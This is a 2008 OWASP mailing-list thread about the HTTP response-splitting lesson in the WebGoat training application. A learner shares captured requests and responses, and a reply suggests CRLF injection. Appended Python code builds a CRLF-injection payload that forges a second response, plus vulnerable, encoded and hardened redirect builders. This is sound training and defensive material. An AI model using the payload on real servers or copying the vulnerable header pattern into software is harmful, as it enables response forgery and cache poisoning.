[Owasp-cincinnati] WebGoat HTTP Splitting Attack Question

Marco Morana marco.m.morana at gmail.com
Fri Jul 18 13:36:51 EDT 2008


Yan

I am not familiar with this lesson, but I would think that to split the
response you would need to inject the CRLF sequence.

Did you try that?

I added further resources on conducting the attack herein (*); hope it helps.

Regards

Marco

(*)
http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
http://www.owasp.org/index.php/HTTP_Response_Splitting


On Fri, Jul 18, 2008 at 9:46 AM, Zhou, Yan <yzhou at medplus.com> wrote:
> Hi there,
>
> Although I successfully completed the HTTP Splitting Attack in WebGoat 5.2, I
> did not understand the step-by-step behavior of the attack. I am using
> WebScarab to capture all requests & responses to give me a better idea.
>
> For example, what does the browser do with the 2nd "made-up" response? Here
> is what I did for testing.
>
> First, I put in the query parameter exactly as is given in the hint:
>
> language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
> ………
>
> This is the response I got from the server below:
>
> HTTP/1.1 302 Moved Temporarily
> Server: Apache-Coyote/1.1
> Location:
> http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&language=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Wed,%2016%20Jul%202018%2012:55:46%20GMT%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert
> undesireable content here</html>
> Content-Type: text/html;charset=ISO-8859-1
> Content-length: 0
> Date: Wed, 16 Jul 2008 13:47:47 GMT
>
> Notice that the response does not appear to be split; the 2nd injected
> response is still part of the query parameter, as shown in the "Location" header.
> Is this a display issue or am I missing something?
>
> The browser then generates the next GET request, and everything I injected is
> now part of the GET parameter (if the response were split, I would not see the
> injected content being part of the query parameter, right?)
>
> GET
> http://localhost:80/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&language=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%2...........
>
> Then the response from the server: the server should respond to the above GET
> request, right? But here is what I see; notice that it is DIFFERENT from what I
> injected because of the additional headers.
>
> HTTP/1.1 200 OK
> Server: Apache-Coyote/1.1
> Pragma: No-cache
> Cache-Control: no-cache
> Expires: Wed, 31 Dec 1969 19:00:00 EST
> Content-Type: text/html
> X-Transfer-Encoding: chunked
> Date: Fri, 18 Jul 2008 13:28:52 GMT
> Content-length: 45
>
> <html>Insert undesireable content here</html>
>
> My questions are:
>
> 1. I would hope to see two responses, split in the middle like this. I
> do not know if this is just a matter of display (since the attack was
> successful):
>
>         HTTP/1.1 200 OK
>         ...
>         Set-Cookie: author=Wiley Hacker
>
>         HTTP/1.1 200 OK
>         ...
>
> 2. Why is there not a response to the 2nd GET request, but a similar
> response to my injected text?
>
> Thanks,
>
> Yan Zhou
>

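As an added illustration of the mechanics discussed in this thread (example code, not from the thread, WebGoat or OWASP): a constructed 302 built the vulnerable way (raw parameter value copied into Location), the same 302 built with the value percent-encoded as it appears in the captured Location header above, a hardened variant that refuses CR/LF outright, and a minimal client-side reader that counts how many HTTP messages it finds in each byte stream. The payload text, URL and forged body are constructed for the example.

```python
import re
from urllib.parse import quote

# Constructed payload, modelled on the WebGoat hint quoted above: terminate the
# first response with an empty body, then forge a complete second response.
FORGED_BODY = "<html>Insert undesirable content here</html>"
PAYLOAD = (
    "foobar\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    f"Content-Length: {len(FORGED_BODY)}\r\n\r\n{FORGED_BODY}"
)

def build_redirect(language: str) -> bytes:
    """Vulnerable pattern: the parameter value is copied into the Location
    header unmodified, so any CR/LF it carries becomes part of the stream."""
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: http://localhost/WebGoat/attack?language={language}\r\n"
        "Content-Type: text/html\r\nContent-Length: 0\r\n\r\n"
    ).encode("latin-1")

def encoded_redirect(language: str) -> bytes:
    """What the capture above shows: the value reaches the header
    percent-encoded (%0D%0A), so no raw CRLF enters the stream."""
    return build_redirect(quote(language, safe=""))

def safe_redirect(language: str) -> bytes:
    """Hardened variant: reject bare CR/LF in a header value before encoding,
    as current servlet containers and web frameworks do."""
    if "\r" in language or "\n" in language:
        raise ValueError("CR/LF not allowed in a header value")
    return encoded_redirect(language)

def split_responses(raw: bytes) -> list:
    """Minimal client-side read: consume messages from a byte stream the way a
    browser or proxy would, using Content-Length to find each message boundary.
    Returns the status line of every well-formed message found."""
    statuses, pos = [], 0
    while pos < len(raw):
        end = raw.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        head = raw[pos:end].decode("latin-1")
        if not head.startswith("HTTP/"):
            break  # trailing junk after a forged message, not a response
        m = re.search(r"^Content-Length:\s*(\d+)\r?$", head, re.M | re.I)
        statuses.append(head.split("\r\n", 1)[0])
        pos = end + 4 + (int(m.group(1)) if m else 0)
    return statuses
```

`split_responses(build_redirect(PAYLOAD))` yields two status lines (the split the question expects to see), while the percent-encoded stream yields one, which is why the captured 302 looks unsplit.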
